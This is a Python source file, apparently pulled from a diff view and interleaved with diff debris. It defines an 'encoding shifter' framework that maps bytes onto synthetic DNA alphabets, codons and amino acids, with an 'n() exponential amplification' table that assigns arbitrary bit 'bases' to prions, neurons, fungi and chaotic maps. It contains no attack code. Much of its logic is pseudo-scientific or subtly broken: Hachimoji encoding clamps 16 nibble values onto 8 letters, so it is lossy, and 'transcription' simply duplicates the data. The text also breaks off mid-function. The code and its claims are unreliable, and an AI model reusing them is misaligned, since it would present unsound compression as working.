'NaM': '5SICS', '5SICS': 'NaM', 'TPT3': 'dNaM', 'dNaM': 'TPT3',
|
|
||||||
# Hirao shape
|
|
||||||
'Ds': 'Px', 'Px': 'Ds', 'Pa': 'dK', 'dK': 'Pa',
|
|
||||||
}
|
|
||||||
|
|
||||||
# ── Codon Table (Natural + Expanded) ───────────────────────────────────────
|
|
||||||
STANDARD_CODON_TABLE = {
|
|
||||||
'UUU': 'F', 'UUC': 'F', 'UUA': 'L', 'UUG': 'L',
|
|
||||||
'CUU': 'L', 'CUC': 'L', 'CUA': 'L', 'CUG': 'L',
|
|
||||||
'AUU': 'I', 'AUC': 'I', 'AUA': 'I', 'AUG': 'M',
|
|
||||||
'GUU': 'V', 'GUC': 'V', 'GUA': 'V', 'GUG': 'V',
|
|
||||||
'UCU': 'S', 'UCC': 'S', 'UCA': 'S', 'UCG': 'S',
|
|
||||||
'CCU': 'P', 'CCC': 'P', 'CCA': 'P', 'CCG': 'P',
|
|
||||||
'ACU': 'T', 'ACC': 'T', 'ACA': 'T', 'ACG': 'T',
|
|
||||||
'GCU': 'A', 'GCC': 'A', 'GCA': 'A', 'GCG': 'A',
|
|
||||||
'UAU': 'Y', 'UAC': 'Y', 'UAA': '*', 'UAG': '*',
|
|
||||||
'CAU': 'H', 'CAC': 'H', 'CAA': 'Q', 'CAG': 'Q',
|
|
||||||
'AAU': 'N', 'AAC': 'N', 'AAA': 'K', 'AAG': 'K',
|
|
||||||
'GAU': 'D', 'GAC': 'D', 'GAA': 'E', 'GAG': 'E',
|
|
||||||
'UGU': 'C', 'UGC': 'C', 'UGA': '*', 'UGG': 'W',
|
|
||||||
'CGU': 'R', 'CGC': 'R', 'CGA': 'R', 'CGG': 'R',
|
|
||||||
'AGU': 'S', 'AGC': 'S', 'AGA': 'R', 'AGG': 'R',
|
|
||||||
'GGU': 'G', 'GGC': 'G', 'GGA': 'G', 'GGG': 'G',
|
|
||||||
}
|
|
||||||
|
|
||||||
# Reverse: amino acid → codons
|
|
||||||
AMINO_CODONS = defaultdict(list)
|
|
||||||
for codon, aa in STANDARD_CODON_TABLE.items():
|
|
||||||
AMINO_CODONS[aa].append(codon)
|
|
||||||
|
|
||||||
AMINO_ACIDS = list(set(STANDARD_CODON_TABLE.values()))
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# n() EXPONENTIAL AMPLIFICATION SYSTEM
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# n(shifter, depth) = base^depth where:
|
|
||||||
# - base = information capacity of the shifter (bits per symbol)
|
|
||||||
# - depth = how many nested/recursive applications of the shifter
|
|
||||||
# - n() represents the combinatorial explosion factor
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class NExponent:
|
|
||||||
"""n() exponential amplification system for shifter encoding capacity."""
|
|
||||||
|
|
||||||
SHIFTER_BASES = {
|
|
||||||
# ── Synthetic DNA Alphabets ──
|
|
||||||
'Hachimoji': 3.0, # 8 letters ≈ 3 bits/letter → 2^3 = 8 states
|
|
||||||
'AEGIS': 3.585, # 12 letters ≈ 3.585 bits/letter
|
|
||||||
'Romesberg': 2.0, # 4 hydrophobic pairs ≈ 2 bits/letter
|
|
||||||
'Hirao': 2.0, # 4 shape-complementary ≈ 2 bits/letter
|
|
||||||
'NaturalDNA': 2.0, # 4 natural bases ≈ 2 bits/base
|
|
||||||
'RNA': 2.0, # 4 bases (AUCG) ≈ 2 bits/base
|
|
||||||
|
|
||||||
# ── Backbone XNAs (same letters, different structural properties) ──
|
|
||||||
'PNA': 2.0, # Peptide backbone (neutral, tighter binding)
|
|
||||||
'LNA': 2.0, # Locked ribose (thermally stable)
|
|
||||||
'TNA': 2.0, # Threose backbone (pre-RNA)
|
|
||||||
'GNA': 2.0, # Glycol backbone (simpler)
|
|
||||||
'HNA': 2.0, # Hexitol backbone (RNA binding)
|
|
||||||
'CeNA': 2.0, # Cyclohexenyl backbone
|
|
||||||
'FANA': 2.0, # Fluoro-arabino (enzyme resistant)
|
|
||||||
'Morpholino': 2.0, # Morpholine ring (therapeutic)
|
|
||||||
'Spiegelmer': 2.0, # L-DNA mirror image (non-degradable)
|
|
||||||
'Boranophosphate': 2.0, # Borane backbone (nuclease resistant)
|
|
||||||
'Phosphorothioate': 2.0, # Sulfur backbone (therapeutic)
|
|
||||||
|
|
||||||
# ── RNA Processing ──
|
|
||||||
'Transcription': 4.0, # DNA→RNA (amplification)
|
|
||||||
'Translation': 3.0, # RNA→Peptide (codon→aa, 3:1 compression)
|
|
||||||
'Splicing': 2.5, # Intron removal (compression)
|
|
||||||
'Editing': 2.0, # Base editing (A→I, C→U)
|
|
||||||
'miRNA': 3.0, # MicroRNA regulation (gene silencing)
|
|
||||||
'siRNA': 3.0, # Small interfering RNA (targeted)
|
|
||||||
'piRNA': 3.0, # Piwi-interacting (transposon defense)
|
|
||||||
'lncRNA': 2.5, # Long non-coding (scaffold)
|
|
||||||
'Riboswitch': 2.0, # Metabolite-sensing RNA
|
|
||||||
'Ribozyme': 2.0, # Catalytic RNA
|
|
||||||
'tRNA': 3.0, # Transfer RNA (adaptor)
|
|
||||||
'rRNA': 2.0, # Ribosomal RNA (structural)
|
|
||||||
|
|
||||||
# ── Prion/Epigenetic ──
|
|
||||||
'Prion': 4.0, # Self-propagating conformational (exponential!)
|
|
||||||
'HistoneMod': 2.5, # Histone acetylation/methylation
|
|
||||||
'DNAmethylation': 2.0, # CpG methylation
|
|
||||||
'Chromatin': 3.0, # Chromatin remodeling (domain scale)
|
|
||||||
'lncRNA_epi': 2.5, # lncRNA-directed epigenetic modification
|
|
||||||
|
|
||||||
# ── Neuronal Encoding ──
|
|
||||||
'SpikeTiming': 4.0, # Precise spike timing (high bandwidth)
|
|
||||||
'STDP': 3.0, # Spike-timing-dependent plasticity
|
|
||||||
'RateCoding': 2.5, # Firing rate encoding
|
|
||||||
'BurstCoding': 3.5, # Burst pattern encoding
|
|
||||||
'PhaseCoding': 3.0, # Oscillatory phase encoding
|
|
||||||
'PopulationCoding': 4.0, # Population vector encoding
|
|
||||||
'SynapticWeight': 3.0, # Weight-based memory
|
|
||||||
'DendriticComp': 3.5, # Dendritic computation
|
|
||||||
|
|
||||||
# ── Mycelial/Fungal ──
|
|
||||||
'HyphalNet': 3.5, # Hyphal network routing
|
|
||||||
'SporeDispersal': 3.0, # Spore-based information dispersal
|
|
||||||
'Symbiotic': 2.5, # Symbiotic exchange (mycorrhizal)
|
|
||||||
'QuorumSensing': 2.0, # Density-based signaling
|
|
||||||
'FungalWave': 3.0, # Calcium wave propagation
|
|
||||||
'MycelialFusion': 3.5, # Hyphal anastomosis (network merging)
|
|
||||||
|
|
||||||
# ── Chaotic Maps ──
|
|
||||||
'LogisticMap': 2.5, # x_{n+1} = r·x_n·(1-x_n)
|
|
||||||
'HenonMap': 3.0, # 2D chaotic attractor
|
|
||||||
'Lorenz': 3.5, # 3D chaotic system
|
|
||||||
'ArnoldCat': 2.0, # Torus automorphism (area-preserving)
|
|
||||||
'ChuaCircuit': 3.5, # Double scroll attractor
|
|
||||||
'ChenMap': 3.0, # Chen's hyperchaotic system
|
|
||||||
|
|
||||||
# ── Galois Ring Algebra ──
|
|
||||||
'GaloisRing': 4.0, # GF(p^k) algebraic operations
|
|
||||||
'SBox': 3.0, # Substitution box (non-linear)
|
|
||||||
'NLFSR': 2.5, # Non-linear feedback shift register
|
|
||||||
|
|
||||||
# ── Compressed Sensing ──
|
|
||||||
'CompressedSensing': 4.0, # Sub-Nyquist sampling
|
|
||||||
'SparseRecovery': 3.5, # L1 minimization
|
|
||||||
|
|
||||||
# ── Cellular Automata ──
|
|
||||||
'Wireworld': 2.0, # Wireworld CA (electronics)
|
|
||||||
'GameOfLife': 2.0, # Conway's Game of Life
|
|
||||||
'Rule30': 2.0, # Rule 30 (chaotic)
|
|
||||||
'Rule110': 2.0, # Rule 110 (Turing complete)
|
|
||||||
'ElementaryCA': 2.0, # General elementary CA
|
|
||||||
|
|
||||||
# ── PIST Geometry (base) ──
|
|
||||||
'PIST': 2.5, # PIST shell coordinates
|
|
||||||
'PISTMirror': 2.0, # Mirror involution
|
|
||||||
'PISTResonance': 2.5, # Mass resonance equivalence
|
|
||||||
|
|
||||||
# ── Arithmetic ──
|
|
||||||
'DeltaGCL': 2.0, # Delta encoding
|
|
||||||
'RunLength': 2.0, # RLE
|
|
||||||
'Huffman': 2.0, # Huffman coding
|
|
||||||
'ArithmeticCoding': 2.5, # Arithmetic coding
|
|
||||||
}
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def n(shifter_name: str, depth: int = 1) -> float:
|
|
||||||
"""n(shifter) = base^depth. Exponential amplification factor."""
|
|
||||||
base = NExponent.SHIFTER_BASES.get(shifter_name, 2.0)
|
|
||||||
return base ** depth
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def n_combined(shifters: list, depths: list = None) -> float:
|
|
||||||
"""n(shifter1, shifter2, ...) = product of n(shifter_i).
|
|
||||||
|
|
||||||
The combined exponential amplification is the product of all bases,
|
|
||||||
representing the combinatorial explosion of nested encoding layers.
|
|
||||||
"""
|
|
||||||
if depths is None:
|
|
||||||
depths = [1] * len(shifters)
|
|
||||||
combined = 1.0
|
|
||||||
for name, depth in zip(shifters, depths):
|
|
||||||
combined *= NExponent.n(name, depth)
|
|
||||||
return combined
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def log_n(combined_factor: float) -> float:
|
|
||||||
"""log2 of n() factor — effective bits per symbol."""
|
|
||||||
return math.log2(max(1.0, combined_factor))
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def format_n(shifter_name: str, depth: int = 1) -> str:
|
|
||||||
"""Format n(shifter) for display."""
|
|
||||||
val = NExponent.n(shifter_name, depth)
|
|
||||||
return f"n({shifter_name}) = {val:.3f} (base^{depth})"
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# PIST GEOMETRY (base coordinate system)
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
def pist_encode(n: int) -> tuple:
|
|
||||||
"""Encode n into (shell, offset). Byte range 0-255 → shells 0-15."""
|
|
||||||
k = int(math.isqrt(n))
|
|
||||||
t = n - k * k
|
|
||||||
return (k, t)
|
|
||||||
|
|
||||||
def pist_decode(k: int, t: int) -> int:
|
|
||||||
"""Decode PIST coordinates back to integer."""
|
|
||||||
return k * k + t
|
|
||||||
|
|
||||||
def pist_mass(k: int, t: int) -> int:
|
|
||||||
"""PIST mass = t·(2k+1-t). Zero at perfect squares (grounded)."""
|
|
||||||
return t * (2 * k + 1 - t)
|
|
||||||
|
|
||||||
def pist_mirror(k: int, t: int) -> tuple:
|
|
||||||
"""Mirror involution preserves mass within shell."""
|
|
||||||
return (k, 2 * k + 1 - t)
|
|
||||||
|
|
||||||
def pist_normalized_tension(k: int, t: int) -> float:
|
|
||||||
"""ρ = t/(2k+1) ∈ [0,1)."""
|
|
||||||
width = 2 * k + 1
|
|
||||||
return t / width if width > 0 else 0.0
|
|
||||||
|
|
||||||
def pist_phase_str(k: int, t: int) -> str:
|
|
||||||
"""Phase classification."""
|
|
||||||
return 'grounded' if pist_mass(k, t) == 0 else 'seismic'
|
|
||||||
|
|
||||||
def intrinsic_load(data: bytes) -> float:
|
|
||||||
"""L_I Shannon entropy in bits per byte."""
|
|
||||||
if not data:
|
|
||||||
return 0.0
|
|
||||||
c = Counter(data)
|
|
||||||
n = len(data)
|
|
||||||
return -sum((cnt / n) * math.log2(cnt / n) for cnt in c.values())
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER BASE CLASS — Any encoding modality
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# A shifter takes manifold state as input and returns transformed manifold state.
|
|
||||||
# Each shifter has:
|
|
||||||
# - encode(state) → transformed state (compression/encoding pass)
|
|
||||||
# - decode(state) → inverse (reconstruction pass)
|
|
||||||
# - fitness(state) → compression_ratio × computation_metric × stability
|
|
||||||
# - n_factor → exponential amplification factor (via NExponent)
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class ManifoldState:
|
|
||||||
"""
|
|
||||||
The fundamental state of the biological manifold.
|
|
||||||
Can be represented in multiple encoding regimes simultaneously.
|
|
||||||
|
|
||||||
Attributes:
|
|
||||||
raw_bytes: The original byte data
|
|
||||||
pist_coords: List of (shell, offset, mass, tension) for each byte
|
|
||||||
shifter_chain: List of (shifter_name, depth) applied so far
|
|
||||||
encoded: Current encoded representation (bytes)
|
|
||||||
n_factor: Combined n() exponential amplification factor
|
|
||||||
fitness_score: Current fitness (compression × computation × stability)
|
|
||||||
entropy: Current Shannon entropy of encoded state
|
|
||||||
regime: Current encoding regime (e.g., 'hachimoji', 'prion', 'spike')
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, data: bytes = None):
|
|
||||||
self.raw_bytes = data or b''
|
|
||||||
self.pist_coords = []
|
|
||||||
self.shifter_chain = []
|
|
||||||
self.encoded = data or b''
|
|
||||||
self.n_factor = 1.0
|
|
||||||
self.fitness_score = 0.0
|
|
||||||
self.entropy = intrinsic_load(self.encoded)
|
|
||||||
self.regime = 'raw'
|
|
||||||
self.metadata = {}
|
|
||||||
|
|
||||||
if data:
|
|
||||||
self._compute_pist()
|
|
||||||
|
|
||||||
def _compute_pist(self):
|
|
||||||
"""Compute PIST coordinates for all bytes."""
|
|
||||||
self.pist_coords = []
|
|
||||||
for b in self.raw_bytes:
|
|
||||||
k, t = pist_encode(b)
|
|
||||||
m = pist_mass(k, t)
|
|
||||||
tens = pist_normalized_tension(k, t)
|
|
||||||
self.pist_coords.append({
|
|
||||||
'byte': b, 'shell': k, 'offset': t,
|
|
||||||
'mass': m, 'tension': tens,
|
|
||||||
'phase': 'grounded' if m == 0 else 'seismic'
|
|
||||||
})
|
|
||||||
|
|
||||||
def update_encoded(self, new_encoded: bytes, shifter_name: str, depth: int = 1):
|
|
||||||
"""Apply a shifter transformation and update state."""
|
|
||||||
self.encoded = new_encoded
|
|
||||||
self.shifter_chain.append((shifter_name, depth))
|
|
||||||
self.entropy = intrinsic_load(new_encoded)
|
|
||||||
|
|
||||||
# Update combined n() factor
|
|
||||||
self.n_factor *= NExponent.n(shifter_name, depth)
|
|
||||||
self.regime = shifter_name
|
|
||||||
|
|
||||||
def compute_fitness(self) -> float:
|
|
||||||
"""
|
|
||||||
fitness = compression_ratio × computation_efficiency × stability
|
|
||||||
|
|
||||||
compression_ratio: raw_size / encoded_size
|
|
||||||
computation_efficiency: 1.0 / (1.0 + entropy) — lower entropy = more efficient
|
|
||||||
stability: 1.0 - abs(0.5 - tension_variance) — moderate tension = stable
|
|
||||||
|
|
||||||
Returns a float in [0, ∞). Higher is better.
|
|
||||||
"""
|
|
||||||
if not self.raw_bytes or not self.encoded:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
# Compression ratio
|
|
||||||
ratio = len(self.raw_bytes) / max(1, len(self.encoded))
|
|
||||||
|
|
||||||
# Computation efficiency (inverse of entropy cost)
|
|
||||||
comp_eff = 1.0 / (1.0 + self.entropy)
|
|
||||||
|
|
||||||
# Stability: measure of PIST tension distribution
|
|
||||||
if self.pist_coords:
|
|
||||||
tensions = [c['tension'] for c in self.pist_coords]
|
|
||||||
if tensions:
|
|
||||||
mean_t = sum(tensions) / len(tensions)
|
|
||||||
var_t = sum((t - mean_t)**2 for t in tensions) / len(tensions)
|
|
||||||
# Ideal: moderate variance (not all grounded, not all seismic)
|
|
||||||
stability = 1.0 - min(1.0, abs(0.25 - var_t) * 2)
|
|
||||||
else:
|
|
||||||
stability = 0.5
|
|
||||||
else:
|
|
||||||
stability = 0.5
|
|
||||||
|
|
||||||
# n() amplification bonus
|
|
||||||
n_bonus = math.log2(max(1.0, self.n_factor)) / 8.0 # normalize to [0, ~1]
|
|
||||||
|
|
||||||
return ratio * comp_eff * (stability + 0.5 * n_bonus)
|
|
||||||
|
|
||||||
|
|
||||||
class Shifter:
|
|
||||||
"""
|
|
||||||
Base class for all encoding shifters.
|
|
||||||
A shifter transforms manifold state in some encoding regime.
|
|
||||||
"""
|
|
||||||
|
|
||||||
name = "BaseShifter"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Encode the manifold state. Returns new state with encoded representation."""
|
|
||||||
raise NotImplementedError
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Inverse operation. Returns decoded state."""
|
|
||||||
raise NotImplementedError
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def n_factor(cls, depth: int = 1) -> float:
|
|
||||||
"""n(shifter) exponential amplification factor."""
|
|
||||||
return NExponent.n(cls.name, depth)
|
|
||||||
|
|
||||||
@staticmethod
|
|
||||||
def chain(shifters: list, state: ManifoldState, direction: str = 'encode') -> ManifoldState:
|
|
||||||
"""
|
|
||||||
Chain multiple shifters in sequence.
|
|
||||||
ANY combination of ANY shifters is allowed.
|
|
||||||
direction: 'encode' (compress) or 'decode' (reconstruct)
|
|
||||||
"""
|
|
||||||
current = state
|
|
||||||
if direction == 'encode':
|
|
||||||
for shifter_cls in shifters:
|
|
||||||
current = shifter_cls.encode(current)
|
|
||||||
else:
|
|
||||||
for shifter_cls in reversed(shifters):
|
|
||||||
current = shifter_cls.decode(current)
|
|
||||||
return current
|
|
||||||
File diff suppressed because it is too large
Load diff
|
|
@ -1,682 +0,0 @@
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 1: HACHIMOJI DNA (8-letter encoding)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# 8 letters → 3 bits per letter → 2.67x raw byte density
|
|
||||||
# Letters: A, T, C, G, Z, P, S, B
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class HachimojiShifter(Shifter):
|
|
||||||
name = "Hachimoji"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Encode bytes as Hachimoji 8-letter DNA sequence."""
|
|
||||||
data = state.encoded
|
|
||||||
|
|
||||||
# Map nibbles (4-bit) to Hachimoji letters
|
|
||||||
# 16 possible nibble values → 16 Hachimoji "codons" (2-letter pairs)
|
|
||||||
letters = list(HACHIMOJI_ALPHABET.keys())
|
|
||||||
|
|
||||||
result = bytearray()
|
|
||||||
for b in data:
|
|
||||||
# Encode byte as two Hachimoji letters
|
|
||||||
hi = (b >> 4) & 0x0F
|
|
||||||
lo = b & 0x0F
|
|
||||||
# Map nibbles to letters (if > 7, wrap around)
|
|
||||||
l1 = letters[min(hi, len(letters) - 1)]
|
|
||||||
l2 = letters[min(lo, len(letters) - 1)]
|
|
||||||
# Store as ordinal values
|
|
||||||
result.append(ord(l1))
|
|
||||||
result.append(ord(l2))
|
|
||||||
|
|
||||||
# Compress: RLE on repeated letter pairs
|
|
||||||
compressed = bytearray()
|
|
||||||
i = 0
|
|
||||||
while i < len(result):
|
|
||||||
j = i
|
|
||||||
while j + 2 <= len(result) and result[j:j+2] == result[i:i+2]:
|
|
||||||
j += 2
|
|
||||||
run = (j - i) // 2
|
|
||||||
if run >= 3:
|
|
||||||
compressed.append(0xFE) # RLE marker
|
|
||||||
compressed.append(run)
|
|
||||||
compressed.append(result[i])
|
|
||||||
compressed.append(result[i+1])
|
|
||||||
i = j
|
|
||||||
else:
|
|
||||||
compressed.append(result[i])
|
|
||||||
i += 1
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(compressed), cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Decode Hachimoji back to bytes."""
|
|
||||||
data = state.encoded
|
|
||||||
letters = list(HACHIMOJI_ALPHABET.keys())
|
|
||||||
letter_to_idx = {l: i for i, l in enumerate(letters)}
|
|
||||||
|
|
||||||
# Expand RLE
|
|
||||||
expanded = bytearray()
|
|
||||||
i = 0
|
|
||||||
while i < len(data):
|
|
||||||
if data[i] == 0xFE and i + 3 < len(data):
|
|
||||||
run = data[i+1]
|
|
||||||
l1 = chr(data[i+2])
|
|
||||||
l2 = chr(data[i+3])
|
|
||||||
for _ in range(run):
|
|
||||||
expanded.append(ord(l1))
|
|
||||||
expanded.append(ord(l2))
|
|
||||||
i += 4
|
|
||||||
else:
|
|
||||||
expanded.append(data[i])
|
|
||||||
i += 1
|
|
||||||
|
|
||||||
# Decode pairs back to bytes
|
|
||||||
result = bytearray()
|
|
||||||
for i in range(0, len(expanded) - 1, 2):
|
|
||||||
c1 = chr(expanded[i])
|
|
||||||
c2 = chr(expanded[i+1])
|
|
||||||
if c1 in letter_to_idx and c2 in letter_to_idx:
|
|
||||||
hi = min(letter_to_idx[c1], 0x0F)
|
|
||||||
lo = min(letter_to_idx[c2], 0x0F)
|
|
||||||
result.append((hi << 4) | lo)
|
|
||||||
else:
|
|
||||||
result.append(expanded[i])
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 2: AEGIS (12+ letter expanded alphabet)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# 12+ letters → ~3.585 bits per letter → more information density
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class AEGISShifter(Shifter):
|
|
||||||
name = "AEGIS"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Encode bytes as AEGIS 12-letter alphabet with base pairing."""
|
|
||||||
data = state.encoded
|
|
||||||
letters = list(AEGIS_ALPHABET.keys())
|
|
||||||
|
|
||||||
result = bytearray()
|
|
||||||
for b in data:
|
|
||||||
# Map 8-bit byte to two AEGIS letters
|
|
||||||
idx = b
|
|
||||||
l1_idx = idx // 12
|
|
||||||
l2_idx = idx % 12
|
|
||||||
if l1_idx >= len(letters):
|
|
||||||
l1_idx = len(letters) - 1
|
|
||||||
if l2_idx >= len(letters):
|
|
||||||
l2_idx = len(letters) - 1
|
|
||||||
result.append(ord(letters[l1_idx]))
|
|
||||||
result.append(ord(letters[l2_idx]))
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Decode AEGIS back to bytes."""
|
|
||||||
data = state.encoded
|
|
||||||
letters = list(AEGIS_ALPHABET.keys())
|
|
||||||
letter_to_idx = {l: i for i, l in enumerate(letters)}
|
|
||||||
|
|
||||||
result = bytearray()
|
|
||||||
for i in range(0, len(data) - 1, 2):
|
|
||||||
c1 = chr(data[i])
|
|
||||||
c2 = chr(data[i+1])
|
|
||||||
idx1 = letter_to_idx.get(c1, 0)
|
|
||||||
idx2 = letter_to_idx.get(c2, 0)
|
|
||||||
b = idx1 * 12 + idx2
|
|
||||||
result.append(min(b, 255))
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 3: NATURAL DNA (4-letter alphabet)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# 4 bases = 2 bits per base → direct nibble mapping
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class NaturalDNAShifter(Shifter):
|
|
||||||
name = "NaturalDNA"
|
|
||||||
|
|
||||||
DNA_LETTERS = ['A', 'C', 'G', 'T'] # 2 bits each
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Encode bytes as DNA 4-letter sequence."""
|
|
||||||
data = state.encoded
|
|
||||||
result = bytearray()
|
|
||||||
for b in data:
|
|
||||||
hi = (b >> 6) & 0x03
|
|
||||||
mid_hi = (b >> 4) & 0x03
|
|
||||||
mid_lo = (b >> 2) & 0x03
|
|
||||||
lo = b & 0x03
|
|
||||||
result.append(ord(cls.DNA_LETTERS[hi]))
|
|
||||||
result.append(ord(cls.DNA_LETTERS[mid_hi]))
|
|
||||||
result.append(ord(cls.DNA_LETTERS[mid_lo]))
|
|
||||||
result.append(ord(cls.DNA_LETTERS[lo]))
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Decode DNA back to bytes."""
|
|
||||||
data = state.encoded
|
|
||||||
letter_to_val = {l: i for i, l in enumerate(cls.DNA_LETTERS)}
|
|
||||||
|
|
||||||
result = bytearray()
|
|
||||||
for i in range(0, len(data) - 3, 4):
|
|
||||||
vals = []
|
|
||||||
for j in range(4):
|
|
||||||
c = chr(data[i+j])
|
|
||||||
vals.append(letter_to_val.get(c, 0))
|
|
||||||
b = (vals[0] << 6) | (vals[1] << 4) | (vals[2] << 2) | vals[3]
|
|
||||||
result.append(b)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 4: RNA TRANSCRIPTION (DNA→RNA, T→U swap)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# Transcription is an amplification step: one DNA → many RNA copies
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class TranscriptionShifter(Shifter):
|
|
||||||
name = "Transcription"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""
|
|
||||||
Transcription: replace T→U, then amplify repeated sequence.
|
|
||||||
The amplification factor represents multiple RNA copies.
|
|
||||||
"""
|
|
||||||
data = state.encoded
|
|
||||||
result = bytearray()
|
|
||||||
|
|
||||||
# T→U conversion (ASCII: T=84→U=85, t=116→u=117)
|
|
||||||
for b in data:
|
|
||||||
if b == ord('T'):
|
|
||||||
result.append(ord('U'))
|
|
||||||
elif b == ord('t'):
|
|
||||||
result.append(ord('u'))
|
|
||||||
else:
|
|
||||||
result.append(b)
|
|
||||||
|
|
||||||
# Amplification: repeat 2x to represent multiple transcripts
|
|
||||||
amplified = result * 2
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(amplified), cls.name)
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def decode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Reverse transcription: U→T, halve length."""
|
|
||||||
data = state.encoded
|
|
||||||
# Halve (remove amplification)
|
|
||||||
half = bytes(data[:len(data)//2]) if len(data) > 1 else data
|
|
||||||
|
|
||||||
result = bytearray()
|
|
||||||
for b in half:
|
|
||||||
if b == ord('U'):
|
|
||||||
result.append(ord('T'))
|
|
||||||
elif b == ord('u'):
|
|
||||||
result.append(ord('t'))
|
|
||||||
else:
|
|
||||||
result.append(b)
|
|
||||||
|
|
||||||
new_state = deepcopy(state)
|
|
||||||
new_state.update_encoded(bytes(result), f"decode_{cls.name}")
|
|
||||||
return new_state
|
|
||||||
|
|
||||||
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
# SHIFTER 5: TRANSLATION (RNA codons → amino acid peptide)
|
|
||||||
# ───────────────────────────────────────────────────────────────────────────────
|
|
||||||
# 3 nucleotides → 1 amino acid → 3:1 compression ratio
|
|
||||||
# ═══════════════════════════════════════════════════════════════════════════════
|
|
||||||
|
|
||||||
class TranslationShifter(Shifter):
|
|
||||||
name = "Translation"
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def encode(cls, state: ManifoldState) -> ManifoldState:
|
|
||||||
"""Translate RNA→Peptide. Groups bytes into codons, maps to amino acids."""
|
|
||||||
rna_data = state.encoded
|
|
||||||
|
|
||||||
# Convert bytes to RNA letters (A=65, C=67, G=71, U=85)
|
|
||||||
rna_str = ''.join(chr(b) for b in rna_data if chr(b) in 'ACGUacgu')
|
|
||||||
rna_str = rna_str.upper()
|
|
||||||
|
|
||||||
# Pad to multiple of 3
|
|
||||||
while len(rna_str) % 3 != 0:
|
|
||||||
rna_str += 'A'
|
|
||||||
|
|
||||||
# Translate
|
|
||||||
peptide = []
|
|
||||||
for i in range(0, len(rna_str), 3):
|
|
||||||
codon = rna_str[i:i+3].replace('T', 'U')
|
|
||||||
if codon in STANDARD_CODON_TABLE:
|
|
||||||
aa = STANDARD_CODON_TABLE[codon]
|
|
||||||
peptide.append(ord(aa[0])) # Store amino acid as ASCII
|
|
||||||
else:
|
|
||||||
peptide.append(ord('X')) # Unknown
|
|
||||||
|
|
||||||
